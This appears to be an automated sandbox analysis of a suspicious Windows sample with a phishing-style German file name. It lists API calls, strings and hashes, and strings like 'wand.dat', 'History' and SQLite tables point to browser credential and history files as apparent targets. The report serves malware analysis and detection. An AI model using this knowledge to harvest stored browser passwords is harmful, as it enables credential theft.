                                                            • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                                                            • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: Window$Rect$ClientParentPoints
                                                            • String ID:
                                                            • API String ID: 4247780290-0
                                                            APIs
                                                              • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                            • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                            • ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                            • memset.MSVCRT ref: 004450CD
                                                              • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                            • ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                              • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                                              • Part of subcall function 00444E84: memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                              • Part of subcall function 00444E84: memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                              • Part of subcall function 00444E84: memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                            • CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                                            • String ID:
                                                            • API String ID: 1471605966-0
                                                            APIs
                                                            • wcscpy.MSVCRT ref: 0044475F
                                                            • wcscat.MSVCRT ref: 0044476E
                                                            • wcscat.MSVCRT ref: 0044477F
                                                            • wcscat.MSVCRT ref: 0044478E
                                                              • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                              • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
                                                              • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?,004447CD,?,?,?,00000000,?), ref: 00409AA5
                                                              • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                                                            • String ID: \StringFileInfo\
                                                            • API String ID: 102104167-2245444037
                                                            APIs
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8EC
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8FA
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E90B
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E922
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E92B
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: ??3@
                                                            • String ID:
                                                            • API String ID: 613200358-0
                                                            APIs
                                                            • GetSystemMetrics.USER32(00000000), ref: 00401990
                                                            • GetSystemMetrics.USER32(00000001), ref: 0040199B
                                                            • SetWindowPlacement.USER32(00000000,?), ref: 004019CC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: MetricsSystem$PlacementWindow
                                                            • String ID: AE
                                                            • API String ID: 3548547718-685266089
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: _memicmpwcslen
                                                            • String ID: @@@@$History
                                                            • API String ID: 1872909662-685208920
                                                            APIs
                                                            • memset.MSVCRT ref: 004100FB
                                                            • memset.MSVCRT ref: 00410112
                                                              • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                              • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                            • _snwprintf.MSVCRT ref: 00410141
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memset$_snwprintf_wcslwrwcscpy
                                                            • String ID: </%s>
                                                            • API String ID: 3400436232-259020660
                                                            APIs
                                                            • memset.MSVCRT ref: 0040E770
                                                            • SendMessageW.USER32(?,0000105F,00000000,?), ref: 0040E79F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: MessageSendmemset
                                                            • String ID: AE$"
                                                            • API String ID: 568519121-1989281832
                                                            APIs
                                                            • memset.MSVCRT ref: 0040D58D
                                                            • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                                                            • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: ChildEnumTextWindowWindowsmemset
                                                            • String ID: caption
                                                            • API String ID: 1523050162-4135340389
                                                            APIs
                                                              • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                                                              • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                                                            • CreateFontIndirectW.GDI32(?), ref: 00401156
                                                            • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                                                            • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                                            • String ID: MS Sans Serif
                                                            • API String ID: 210187428-168460110
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: ClassName_wcsicmpmemset
                                                            • String ID: edit
                                                            • API String ID: 2747424523-2167791130
                                                            APIs
                                                              • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                              • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                              • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                              • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                            • GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 00414E2B
                                                            • FreeLibrary.KERNEL32(00000000,?,00405751,00000000), ref: 00414E43
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                            • String ID: SHAutoComplete$shlwapi.dll
                                                            • API String ID: 3150196962-1506664499
                                                            APIs
                                                            • memcpy.MSVCRT(?,00000000,00000030,00000000), ref: 0041D8A6
                                                            • memcpy.MSVCRT(?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8BC
                                                            • memcmp.MSVCRT(?,?,00000030,?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8CB
                                                            • memcmp.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,00000000), ref: 0041D913
                                                            • memcpy.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041D92E
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memcpy$memcmp
                                                            • String ID:
                                                            • API String ID: 3384217055-0
                                                            • Opcode ID: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                            • Instruction ID: f5df6941464580ef2fdae31f27b7f31021858bb2d0e37ec30fcb1df3a02010a9
                                                            • Opcode Fuzzy Hash: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                            • Instruction Fuzzy Hash: 8821B2B2E10249ABDB14EA91DC46EDF73FC9B44704F01442AF512D7181EB28E644C725
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memset$memcpy
                                                            • String ID:
                                                            • API String ID: 368790112-0
                                                            • Opcode ID: 8ce092fd9a5e59041eb9f85ad4e05697c1cc0ba7cb52d02734991e9cdc0d3c07
                                                            • Instruction ID: abb90bdd0bd5c960a46cc99acd1c91865272cbbdb433919b32c204757dd19146
                                                            • Opcode Fuzzy Hash: 8ce092fd9a5e59041eb9f85ad4e05697c1cc0ba7cb52d02734991e9cdc0d3c07
                                                            • Instruction Fuzzy Hash: 0201FCB5740B007BF235AB35CC03F9A73A8AF52724F004A1EF153966C2DBF8A554819D
                                                            APIs
                                                              • Part of subcall function 004019D8: GetMenu.USER32(?), ref: 004019F6
                                                              • Part of subcall function 004019D8: GetSubMenu.USER32(00000000), ref: 004019FD
                                                              • Part of subcall function 004019D8: EnableMenuItem.USER32(?,?,00000000), ref: 00401A15
                                                              • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000412,?,00000000), ref: 00401A36
                                                              • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000411,?,?), ref: 00401A5A
                                                            • GetMenu.USER32(?), ref: 00410F8D
                                                            • GetSubMenu.USER32(00000000), ref: 00410F9A
                                                            • GetSubMenu.USER32(00000000), ref: 00410F9D
                                                            • CheckMenuRadioItem.USER32(00000000,0000B284,0000B287,?,00000000), ref: 00410FA9
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: Menu$ItemMessageSend$CheckEnableRadio
                                                            • String ID:
                                                            • API String ID: 1889144086-0
                                                            • Opcode ID: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                                            • Instruction ID: be5000c07a60ff25a23af51018491178d5f127676f18bd69b4cc56e9e4830f27
                                                            • Opcode Fuzzy Hash: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                                            • Instruction Fuzzy Hash: D5517171B40704BFEB20AB66CD4AF9FBAB9EB44704F00046EB249B72E2C6756D50DB54
                                                            APIs
                                                            • CreateFileMappingW.KERNEL32(?,00000000,00000004,00000000,?,00000000), ref: 004180B8
                                                            • MapViewOfFile.KERNEL32(00000000,00000006,00000000,?,?), ref: 004180E3
                                                            • GetLastError.KERNEL32 ref: 0041810A
                                                            • CloseHandle.KERNEL32(00000000), ref: 00418120
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: File$CloseCreateErrorHandleLastMappingView
                                                            • String ID:
                                                            • API String ID: 1661045500-0
                                                            • Opcode ID: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                                            • Instruction ID: 5cb71d9443798353a032a6b226e7c46d85178154149a60e532078a3cdb21b7c8
                                                            • Opcode Fuzzy Hash: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                                            • Instruction Fuzzy Hash: 64518A71204706DFDB24CF25C984AA7BBE5FF88344F10492EF84287691EB74E895CB99
                                                            APIs
                                                              • Part of subcall function 00415A91: memset.MSVCRT ref: 00415AAB
                                                            • memcpy.MSVCRT(?,?,?), ref: 0042EC7A
                                                            Strings
                                                            • sqlite_altertab_%s, xrefs: 0042EC4C
                                                            • virtual tables may not be altered, xrefs: 0042EBD2
                                                            • Cannot add a column to a view, xrefs: 0042EBE8
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memcpymemset
                                                            • String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
                                                            • API String ID: 1297977491-2063813899
                                                            • Opcode ID: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                            • Instruction ID: f910cd7a27c7e389b2617bf4251edf561ae6288f62f29054cc1fb9bea0934792
                                                            • Opcode Fuzzy Hash: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                            • Instruction Fuzzy Hash: 1E418E75A00615EFCB04DF5AD881A99BBF0FF48314F65816BE808DB352D778E950CB88
                                                            APIs
                                                            • memset.MSVCRT ref: 0040560C
                                                              • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                                              • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                              • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                                              • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                              • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                              • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                              • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                              • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                              • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                              • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                              • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                              • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                              • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                            • String ID: *.*$dat$wand.dat
                                                            • API String ID: 2618321458-1828844352
                                                            • Opcode ID: 0657051124b0d036bd635f999d135efdf1f0fa3481af6b00979a6af828487765
                                                            • Instruction ID: e27ea46a2f82f1f177a07810d763c9ecc86b2647b265d762bc330c580f82b585
                                                            • Opcode Fuzzy Hash: 0657051124b0d036bd635f999d135efdf1f0fa3481af6b00979a6af828487765
                                                            • Instruction Fuzzy Hash: BF419B71600205AFDB10AF65DC85EAEB7B9FF40314F10802BF909AB1D1EF7999958F89
                                                            APIs
                                                              • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040ECF9
                                                              • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040EDC0
                                                            • wcslen.MSVCRT ref: 00410C74
                                                            • _wtoi.MSVCRT(?,?,00000000,00000000,00000000,?,00000000), ref: 00410C80
                                                            • _wcsicmp.MSVCRT ref: 00410CCE
                                                            • _wcsicmp.MSVCRT ref: 00410CDF
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: _wcsicmp$??2@??3@_wtoiwcslen
                                                            • String ID:
                                                            • API String ID: 1549203181-0
                                                            • Opcode ID: ea618d40444277bd221524d3c134f5417e022d6ba5f32085407bce5ff1a0f2d9
                                                            • Instruction ID: d767fa7272777d82bc727b9b5621bf7cb5fcf48a3d465f11467ce1d5a1151d11
                                                            • Opcode Fuzzy Hash: ea618d40444277bd221524d3c134f5417e022d6ba5f32085407bce5ff1a0f2d9
                                                            • Instruction Fuzzy Hash: 5E4190359006089FCF21DFA9D480AD9BBB4EF48318F1105AAEC05DB316D6B4EAC08B99
                                                            APIs
                                                            • memset.MSVCRT ref: 00412057
                                                              • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,Function_0004E518,Function_0004E518,00000005), ref: 0040A12C
                                                            • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                                                            • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                                                            • GetKeyState.USER32(00000010), ref: 0041210D
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                                            • String ID:
                                                            • API String ID: 3550944819-0
                                                            • Opcode ID: e484aa313eeb80bd7472f2401a4c50dedc9a7c38d875d1deba0becea129ff557
                                                            • Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
                                                            • Opcode Fuzzy Hash: e484aa313eeb80bd7472f2401a4c50dedc9a7c38d875d1deba0becea129ff557
                                                            • Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
                                                            APIs
                                                            • free.MSVCRT ref: 0040F561
                                                            • memcpy.MSVCRT(00000000,?,00000001,g4@,00000000,0000121C,?,?,?,00403467), ref: 0040F573
                                                            • memcpy.MSVCRT(00000000,?,?,00000000), ref: 0040F5A6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memcpy$free
                                                            • String ID: g4@
                                                            • API String ID: 2888793982-2133833424
                                                            • Opcode ID: e202219f899f6405cf9ccc08ea0a2323c377b0568c486578cbaaf15be4e6d242
                                                            • Instruction ID: 6372a4083673351870aa2a156e9431cadfa41d37230e9e7fabcd635cb7c3c96e
                                                            • Opcode Fuzzy Hash: e202219f899f6405cf9ccc08ea0a2323c377b0568c486578cbaaf15be4e6d242
                                                            • Instruction Fuzzy Hash: D2217A30900604EFCB20DF29C94182ABBF5FF447247204A7EE852A3B91E735EE119B04
                                                            APIs
                                                            • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129CF
                                                            • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129F9
                                                            • memcpy.MSVCRT(?,?,00000013,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 00412A1D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memcpy
                                                            • String ID: @
                                                            • API String ID: 3510742995-2766056989
                                                            • Opcode ID: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                            • Instruction ID: b25eae0e74258469ce0af521155fdf6a80f479b4e9ffe9ec94392e3587c9c40c
                                                            • Opcode Fuzzy Hash: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                            • Instruction Fuzzy Hash: 65115EF2A003057FDB349E15D980C9A77A8EF50394B00062FF90AD6151E7B8DEA5C7D9
                                                            APIs
                                                            • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,00401516,?,?,?,?,00457660,0000000C), ref: 0040AF07
                                                            • memset.MSVCRT ref: 0040AF18
                                                            • memcpy.MSVCRT(0045A474,?,00000000,00000000,00000000,00000000,00000000,?,?,00401516,?,?,?,?,00457660,0000000C), ref: 0040AF24
                                                            • ??3@YAXPAX@Z.MSVCRT ref: 0040AF31
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
